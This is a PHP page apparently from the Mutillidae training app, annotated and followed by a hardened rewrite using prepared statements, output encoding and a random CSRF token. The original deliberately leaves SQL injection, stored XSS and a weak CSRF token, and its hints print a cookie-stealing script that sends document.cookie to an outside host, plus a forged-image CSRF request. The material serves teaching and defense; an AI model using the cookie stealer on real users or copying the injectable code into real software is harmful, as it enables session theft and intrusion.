add-to-your-blog.php (executable file, 95 lines, 82 loc, 3.78 KB)
<center><h2><b>Add to your blog</b></h2></center><p>
<form method="POST" action="<?php echo $_SERVER['SCRIPT_NAME'] . "?" . $_SERVER['QUERY_STRING']; ?>">
<p>Welcome to your blog, leave an entry. Login, or you will be listed as "anonymous":</p>
<!--<p><input type="text" name="user_name" size="20"></p> -->
<p><textarea rows="10" cols="50" name="input" size="20"></textarea></p>
<input type="hidden" name="xsrf_token" value="<?php echo generateToken('protectedForm'); ?>"/>
<p><input type="submit" value="Submit" name="Submit_button"></p>
</form>
<?php
// The token is sha1(form name . session id): constant for the whole session and
// computable by anyone who learns the session id. session_start() is called lazily
// here, after the HTML above has already been sent, so it only succeeds if the session
// was started earlier (before any output) or output buffering is enabled.
function generateToken( $formName )
{
    if ( !session_id() ) {
        session_start();
    }
    $sessionId = session_id();
    return sha1( $formName.$sessionId );
}
function checkToken( $token, $formName )
{
    return $token === generateToken( $formName );
}
// The token is read from $_POST only, so the GET-based <img> request described in the
// hints below never reaches the INSERT.
if ( !empty( $_POST['xsrf_token'] ) ) {
    if( checkToken( $_POST['xsrf_token'], 'protectedForm' ) ) {
        // Grab inputs. "input" comes from $_REQUEST, so GET or POST can supply it.
        // mysql_* (removed in PHP 7) needs an open connection for the escaping call.
        $inputfromform = mysql_real_escape_string($_REQUEST["input"]);
        $showonlyuser = $_REQUEST["show_only_user"]; // read but never used
        if ($inputfromform <> "") {
            // $logged_in_user is defined outside this file and is concatenated into the
            // SQL unescaped (deliberate: this is the injection point the app teaches).
            $query = "INSERT INTO blogs_table(blogger_name, comment, date) VALUES ('".
                $logged_in_user . "', '".
                $inputfromform . "', " .
                " now() )";
            $result = mysql_query($query);
        }
        // Same unescaped $logged_in_user inside a LIKE pattern.
        $query = "SELECT * FROM blogs_table WHERE
            blogger_name like '{$logged_in_user}%'
            ORDER BY date DESC
            LIMIT 0 , 100";
        // On failure the full SQL statement is echoed back (verbose error disclosure).
        $result = mysql_query($query) or die(mysql_error($conn) . '<p><b>SQL Statement:</b>' . $query);
        //echo $result;
        echo 'Entries:<p>';
        while($row = mysql_fetch_array($result, MYSQL_ASSOC))
        {
            // Stored fields are echoed without encoding: the stored XSS the hints mention.
            echo "<p><b>{$row['blogger_name']}:</b>({$row['date']})<br>{$row['comment']}</p>";
        }
        echo "<p>";
        echo "anti-XSRF token OK" , "<br> <br>";
    }
    else {
        echo "<BR> <BR>", "ANTI - XSRF TOKEN TAMPERED WITH!", "<BR> <BR>";
    }
}
// Begin hints section
// Note: the <script> inside the <pre> and the <img> tag below are emitted as live HTML,
// so a browser showing the hints executes the script and issues the image request.
if ($_COOKIE["showhints"]==1) {
    echo '<p><span style="background-color: #FFFF00">
<b>For XSS:</b> XSS is easy stuff. This one shows off both reflected (you see the results
instantly) and stored (someone can run across it later in another app that
uses the same database). "<script>alert("XSS");</script>" is the classic, but
there are far more interesting things you could do, which I plan to show in a video later.
For some hot cookie stealing action, try something like:</span></p>
<pre>
<script>
new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie);
</script>
</pre>
<p><span style="background-color: #FFFF00">
Also, check out <a href="http://ha.ckers.org/xss.html">Rsnake\'s XSS Cheat Sheet</a>
for more ways you can encode XSS attacks that may allow you to get around some filters.
<br><br>
<b>For XSRF:</b> OK, what you have to do is create another page someplace and
make a link to an image that is not an image. You could use something like
the following:
<br>
<img src="http://dojo-basic/index.php?page=add-to-your-blog.php&input=hi%20there%20monkeyboy">
<br>
This is the easy way to do XSRF with the GET method. Just log in as someone, make
your page with the image link someplace else, and then view it. You should now see
something new on the comment wall. :)
<br>
<b>WATCH OUT for the new anti-XSRF token!!!!</b>
</span></p>';
}
?>
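The handler below is an added example written for this page; it is not Mutillidae's code and not a fix the project shipped. It keeps the same form field (xsrf_token, input) and table (blogs_table) but replaces the deterministic sha1(formName . sessionId) token with a random per-session value compared with hash_equals(), moves the string-built INSERT and SELECT to PDO prepared statements (the mysql_* functions used above were removed in PHP 7), HTML-encodes stored rows on output so the stored payload from the hints is rendered inert, and sets HttpOnly and SameSite on the session cookie so the document.cookie stealer in the hints gets nothing. The in-memory SQLite table, the $session array standing in for $_SESSION, the expect() helper and the sample entry are all constructed here so the script runs from the command line; it assumes PHP 7.3 or later with the PDO sqlite driver.

```php
<?php
declare(strict_types=1);
// Added example, not Mutillidae code. Assumes PHP >= 7.3 with the PDO sqlite driver;
// a real deployment would point PDO at the MySQL database instead of the table below.

function startSession(): void
{
    // HttpOnly keeps the session id out of document.cookie; SameSite=Lax stops the
    // browser attaching it to cross-site POSTs; Secure restricts it to HTTPS.
    session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax', 'secure' => true]);
    session_start(); // must run before any output, unlike the original's lazy start
}

function issueToken(array &$session): string
{
    // Random and per session: not something derivable from a form name and a
    // session id, which is all the original sha1() token was built from.
    if (empty($session['xsrf_token'])) {
        $session['xsrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['xsrf_token'];
}

function checkToken(array $session, ?string $submitted): bool
{
    // hash_equals() is a constant-time comparison; a missing token fails closed.
    return $submitted !== null
        && isset($session['xsrf_token'])
        && hash_equals($session['xsrf_token'], $submitted);
}

function addEntry(PDO $db, string $user, string $comment): void
{
    // Prepared statement: the original concatenated $logged_in_user into the SQL.
    $stmt = $db->prepare('INSERT INTO blogs_table (blogger_name, comment, date) VALUES (?, ?, ?)');
    $stmt->execute([$user, $comment, date('Y-m-d H:i:s')]);
}

function renderEntries(PDO $db, string $user): string
{
    // The LIKE pattern is bound, and its wildcards are escaped so a name containing
    // % or _ cannot widen the match to other bloggers' entries.
    $pattern = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $user) . '%';
    $stmt = $db->prepare("SELECT blogger_name, comment, date FROM blogs_table
                          WHERE blogger_name LIKE ? ESCAPE '!' ORDER BY date DESC LIMIT 100");
    $stmt->execute([$pattern]);
    $html = '';
    foreach ($stmt as $row) {
        // Encode every stored field on output; the original echoed them raw.
        $html .= sprintf("<p><b>%s:</b>(%s)<br>%s</p>\n",
            htmlspecialchars($row['blogger_name'], ENT_QUOTES | ENT_HTML5, 'UTF-8'),
            htmlspecialchars($row['date'], ENT_QUOTES | ENT_HTML5, 'UTF-8'),
            htmlspecialchars($row['comment'], ENT_QUOTES | ENT_HTML5, 'UTF-8'));
    }
    return $html;
}

function expect(bool $ok, string $what): void
{
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

// Constructed demonstration data: an in-memory table with the same columns as
// blogs_table, and a plain array standing in for $_SESSION.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE blogs_table (blogger_name TEXT, comment TEXT, date TEXT)');
$session = [];
$token = issueToken($session);

// The hints' <img src="...&input=..."> forgery carries no token: rejected.
expect(checkToken($session, null) === false, 'request without token is rejected');
// Recomputing the original scheme's sha1(formName . sessionId) no longer helps either.
expect(checkToken($session, sha1('protectedForm' . 'guessed-session-id')) === false, 'guessed token is rejected');
// A genuine post carrying the hidden field's value: accepted.
expect(checkToken($session, $token) === true, 'real token is accepted');

// The hints' classic payload is stored verbatim but rendered inert.
addEntry($db, 'anonymous', '<script>alert("XSS");</script>');
$page = renderEntries($db, 'anonymous');
expect(strpos($page, '<script>') === false, 'stored script is encoded on output');
expect(strpos($page, '&lt;script&gt;') !== false, 'encoded form is present');
echo $page;
```

In the real handler you would call startSession() before emitting any HTML, pass $_SESSION to issueToken() and checkToken(), print the token into the hidden xsrf_token field exactly as the form above does, and read the comment from $_POST rather than $_REQUEST so a GET cannot supply it. SameSite=Lax does not replace the token: it is a browser-side default that older clients ignore, and a same-site attacker page would still be able to post.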